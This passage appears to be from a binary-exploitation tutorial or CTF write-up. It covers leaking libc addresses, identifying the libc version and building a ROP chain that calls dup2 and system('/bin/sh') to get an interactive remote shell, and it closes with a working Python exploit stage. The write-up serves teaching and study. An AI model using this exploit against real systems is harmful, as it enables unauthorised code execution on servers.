b'@\x80J|~\x7f\x00\x00\xb0\xe0G|~\x7f\x00\x00\xd0$R|~\x7f\x00\x00p\x99L|~\x7f\x00\x00\xd0\x99L|~\x7f\x00\x00\x10\xbe?|~\x7f\x00\x00\xe0\x87J|~\x7f\x00\x00\xa0\x7fJ|~\x7f\x00\x00\x80\xd0=|~\x7f\x00\x00\x90\xa2K|~\x7f\x00\x00\xd0\x99L|~\x7f\x00\x000\xa1K|~\x7f\x00\x00\x90\xa0K|~\x7f\x00\x000\xe7=|~\x7f\x00\x00\xc0\x0b>|~\x7f\x00\x00\xe0\xceG|~\x7f\x00\x00'
[*] Leaked libc write: 0x7f7e7c4a8040
[*] Leaked libc getpid: 0x7f7e7c47e0b0
Request complete, Closing...
*** Connection closed by remote host ***

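We now have the addresses of write and getpid; only their last three hex digits are needed. Using libc.nullbyte.cat, we look them up in the libc database to identify the libc version on the remote machine.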
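
As a small illustration of how the leaked blob is turned into lookup keys, the sketch below decodes the first 16 bytes of the sample leak above and prints the low 12 bits of each address. The entry order (write, then getpid) is the GOT order seen in gdb; the variable names are ours.

```python
from struct import unpack

# First 16 bytes of the sample leak: GOT entries for write and getpid.
leak = b'@\x80J|~\x7f\x00\x00\xb0\xe0G|~\x7f\x00\x00'
names = ["write", "getpid"]

# Each GOT entry is an 8-byte little-endian pointer.
entries = dict(zip(names, unpack("<2Q", leak)))

for name, addr in entries.items():
    # The low 12 bits survive ASLR and are what a libc database is keyed on.
    print(name, hex(addr), hex(addr & 0xfff))
```

Supplying two or more symbols with their low 12 bits usually narrows the candidates down much better than a single one.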
::: hljs-center

5.png

:::

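With that, we have successfully obtained the libc base address.

Getting an interactive shell

Since we know the libc version, we only need the offsets of str_bin_sh and system to get a shell by executing system('/bin/sh'). But that shell is not interactive, because a shell reads from stdin and writes to stdout, and in the child those are not connected to our socket. So we use dup2 to duplicate a file descriptor and redirect the process's stdin, stdout and stderr. As mentioned, everything is a file on Linux; the default descriptors for stdin, stdout and stderr are 0, 1 and 2.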
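
The redirection can be tried locally before it is put into a ROP chain. The following sketch is an illustration rather than part of the exploit: it uses a socketpair in place of the client connection and a forked child in place of the server's child, and the helper name run_over_socket is hypothetical. It assumes a Unix-like system with /bin/sh.

```python
import os
import socket

def run_over_socket(command: str) -> bytes:
    """Run a shell command whose stdin, stdout and stderr are a socket."""
    parent_end, child_end = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        try:
            parent_end.close()
            for std_fd in (0, 1, 2):        # same idea as dup2(4, 0), dup2(4, 1), dup2(4, 2)
                os.dup2(child_end.fileno(), std_fd)
            os.execv("/bin/sh", ["/bin/sh", "-c", command])
        finally:
            os._exit(127)                   # only reached if exec failed
    child_end.close()
    chunks = []
    while True:                             # read until the shell exits and the socket closes
        data = parent_end.recv(4096)
        if not data:
            break
        chunks.append(data)
    parent_end.close()
    os.waitpid(pid, 0)
    return b"".join(chunks)

print(run_over_socket("echo hello"))
```

Everything the shell prints arrives on the other end of the socket, which is exactly what the remote client needs in order to interact with it.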

Here is the documentation for dup2:
```
$ man 2 dup2
NAME
       dup, dup2, dup3 - duplicate a file descriptor
SYNOPSIS
       #include <unistd.h>
       int dup(int oldfd);
       int dup2(int oldfd, int newfd);
DESCRIPTION
       The dup() system call creates a copy of the file descriptor oldfd,
       using the lowest-numbered unused file descriptor for the new descriptor.

       After a successful return, the old and new file descriptors may be
       used  interchangeably.  They refer to the same open file description
       (see open(2)) and thus share file offset and file status flags...
```

We can use cfd as stdin, stdout and stderr. The calls look like this:

```
dup2(4, 0);
dup2(4, 1);
dup2(4, 2);
system("/bin/sh");
```

The complete exploit consists of the brute-force script and the leak script above, followed by the final stage below. Remember to change the return address offset (0x1552), the b'\x52' start byte and ret_range to match your binary.

```
from telnetlib import Telnet    # note: telnetlib was removed from the standard library in Python 3.13

libc_write_off = 0x0f0b40       # offset of write in the identified libc
LIBC_BASE = libc_write - libc_write_off
print("[*] Libc base calculated:\t", hex(LIBC_BASE))

dup2   = LIBC_BASE + 0x0f13a0
system = LIBC_BASE + 0x0496e0
bin_sh = LIBC_BASE + 0x18c143

print("[*] Generating final payload.")

buf  = b'A'*200
buf += p64(CANARY)
buf += p64(RBP)
buf += p64(ret_gad)             # for stack alignment to 16 bytes
buf += p64(pop_rsi_r15)         # '4' already in rdi so continue from rsi
buf += p64(2)*2                 # stderr (second copy fills r15)
buf += p64(dup2)                # call dup2
buf += p64(pop_rsi_r15)
buf += p64(1)*2                 # stdout
buf += p64(dup2)                # call dup2
buf += p64(pop_rsi_r15)
buf += p64(0)*2                 # stdin
buf += p64(dup2)                # call dup2
buf += p64(pop_rdi)
buf += p64(bin_sh)
buf += p64(system)
buf += p64(RET)                 # continue execution normally with actual return address

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(TRGT)
s.recv(1024)
s.send(buf)
print("[*] Payload sent.")
sleep(1)                        # just a little wait to finish execution
t = Telnet()                    # make a telnet object
t.sock = s                      # assign socket to telnet
t.write(b'id\n')                # enter a command
t.interact()                    # get interactive shell over telnet
```
The complete code is available here.
::: hljs-center

6.jpg

:::

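If everything goes well you will get an interactive shell. If it fails, you can attach to the process and debug.

Conclusion

In this case study we learned how to defeat PIE and the canary in a short time by brute force, how to identify the libc version by leaking the addresses of a few libc functions, and how to get a shell over a socket by duplicating file descriptors, although this approach is not widely applicable. One more point: there is more than one way to bypass PIE. Since relative offsets within the program do not change, as discussed above, a partial overwrite of the return address can achieve the same goal.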
